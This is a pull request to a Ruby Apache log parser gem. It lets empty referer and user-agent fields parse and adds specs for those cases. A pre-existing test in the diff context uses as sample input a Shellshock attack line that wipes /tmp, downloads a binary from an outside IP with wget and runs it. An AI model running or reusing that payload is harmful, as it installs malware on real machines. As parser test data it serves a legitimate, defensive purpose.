### PR TITLE
Support logs where the user agent or referer is empty string

### DIFF
--- a/apache_log-parser.gemspec
+++ b/apache_log-parser.gemspec
@@ -18,7 +18,7 @@ Gem::Specification.new do |spec|
   spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
   spec.require_paths = ["lib"]
 
-  spec.add_development_dependency "bundler", "~> 1.6"
+  spec.add_development_dependency "bundler", "> 1.6"
   spec.add_development_dependency "rake"
   spec.add_development_dependency "rspec"
 end

--- a/lib/apache_log/parser.rb
+++ b/lib/apache_log/parser.rb
@@ -7,7 +7,7 @@ module ApacheLog
     COMBINED_FIELDS = COMMON_FIELDS + %w(referer user_agent)
 
     COMMON_PATTERN = '(?:^|\s)((?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:[\w:]+?))\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(.*?)"\s+(\S+)\s+(\S+)'
-    COMBINED_PATTERN = COMMON_PATTERN + '\s+"(.*?[^\\\\])"\s+"(.*?[^\\\\])"'
+    COMBINED_PATTERN = COMMON_PATTERN + '\s+"(.*?[^\\\\]|)"\s+"(.*?[^\\\\]|)"'
     ADDITIONAL_PATTERN = '\s+"?([^"]*)"?'
 
     def initialize(format, additional_fields=[])

--- a/spec/apache_log/parser_spec.rb
+++ b/spec/apache_log/parser_spec.rb
@@ -54,6 +54,26 @@ describe ApacheLog::Parser do
     expect(entity).to eq(expect)
   end
 
+  it 'can parse combined log with blank referer' do
+    line = '192.168.0.1 - - [07/Feb/2011:10:59:59 +0900] "GET /x/i.cgi/net/0000/ HTTP/1.1" 200 9891 "" "DoCoMo/2.0 P03B(c500;TB;W24H16)"';
+    parser = ApacheLog::Parser.new('combined')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '192.168.0.1', identity_check: '-', user:'-', datetime: DateTime.new(2011, 2, 7, 10, 59, 59, 0.375),
+      request: {method: 'GET', path: '/x/i.cgi/net/0000/', protocol: 'HTTP/1.1'}, status: '200', size: '9891', referer: '',
+      user_agent: 'DoCoMo/2.0 P03B(c500;TB;W24H16)'}
+    expect(entity).to eq(expect)
+  end
+
+  it 'can parse combined log with blank user agent' do
+    line = '192.168.0.1 - - [07/Feb/2011:10:59:59 +0900] "GET /x/i.cgi/net/0000/ HTTP/1.1" 200 9891 "-" ""';
+    parser = ApacheLog::Parser.new('combined')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '192.168.0.1', identity_check: '-', user:'-', datetime: DateTime.new(2011, 2, 7, 10, 59, 59, 0.375),
+      request: {method: 'GET', path: '/x/i.cgi/net/0000/', protocol: 'HTTP/1.1'}, status: '200', size: '9891', referer: '-',
+      user_agent: ''}
+    expect(entity).to eq(expect)
+  end
+
   it 'can parse attack log' do
     line = '121.207.230.74 - - [13/Apr/2015:08:21:54 +0900] "GET / HTTP/1.1" 200 2392 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""'
     parser = ApacheLog::Parser.new('combined')


### PR DESCRIPTION
I've encountered this in apache2 logs, and currently it won't parse.
